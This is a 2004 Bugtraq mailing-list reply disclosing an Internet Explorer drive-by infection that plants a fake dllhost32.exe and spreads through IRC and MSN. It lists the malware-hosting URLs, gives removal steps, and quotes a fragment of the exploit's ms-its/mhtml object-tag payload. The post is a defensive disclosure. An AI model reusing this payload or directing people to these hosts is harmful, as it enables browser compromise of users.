-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 i've seen this vuln being exploited on the following urls *brasky.com* *ilwig.net/rofl.swf* *sillyu.afraid.org* *preview.ampuh.info* *just4fun.afraid.org* *nowim.4t3.com* *goten007.cjb.net* depending on what version of windows you run, you may also need to remove other files (ie - c:\windows\prefetch\dllhost32.exe*, and possibly from dllcache). you may have to delete these files in safe mode. to quote rats: "its in remotes in mirc, and you delete dllhost32.exe in safemode. dllhost32.exe is a fake bin, the real one is dllhost.exe, and you delete 2 strings in regedit wich shows dllhost32.exe "as" the real one and then you are done " it also puts lines in mirc remote.ini i have also been told of another possible variant, discussed here: http://rentalforums.nuclearfallout.net/viewtopic.php?t=1040 Gavin - -- In God we trust, Everyone else must have an X.509 certificate. - ----- Original Message ----- From: "Philip Barnham" <phycho@darktech.org.uk> To: <bugtraq@securityfocus.com> Sent: Monday, April 05, 2004 12:14 PM Subject: Fw: new IE vurn : hey guys, i think theres a new IE vurn going about, as i was told to visit : : <phy|lappy> wanna see my site? www.sillyu.afraid.org : <aenigma> omg this is funny www.sillyu.afraid.org : <phy|lappy> check me out!! www.preview.ampuh.info :D : <bleefis> wanna see my site? www.preview.ampuh.info : : after visiting this site, i noticed "dllhost32.exe" in my system32 : directory, this is not picked up by any antivirus scanner. it advertises the : website above in IRC and on msn, it then stops conversations on mirc : appearing on your screen so you dont know there is any activity in any of : the rooms : : after visiting this site, i did not get any warning from IE whatsoever, and : i have all the latest microsoft security fixes installed. : : is this yet another security flaw in microsoft IE?. : : solution : : delete dllhost32.exe and restart mirc, everything appears to work fine. : : any information about this would be appreciated. : : : <!-- VVZkV2RXSXpaeja1 --> : <textarea style='display:none;' id='code'> : <object : data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/L OI.CHM : ::/loi.htm" type="text/x-scriptlet"></object> : </textarea> : : taken from http://users.volja.net/madbox/loi.htm (dont click it) : looks like another hole in IE!. -----BEGIN PGP SIGNATURE----- Version: PGP 8.0.2 iQA/AwUBQHGQ+TJ2eyFxcwE8EQL1KgCgh5soGM4FzBq3Ncfe5Jgn7QtyynUAnRT8 x6z1BTuiuV33Yv0z4X3sijk7 =bk6S -----END PGP SIGNATURE-----
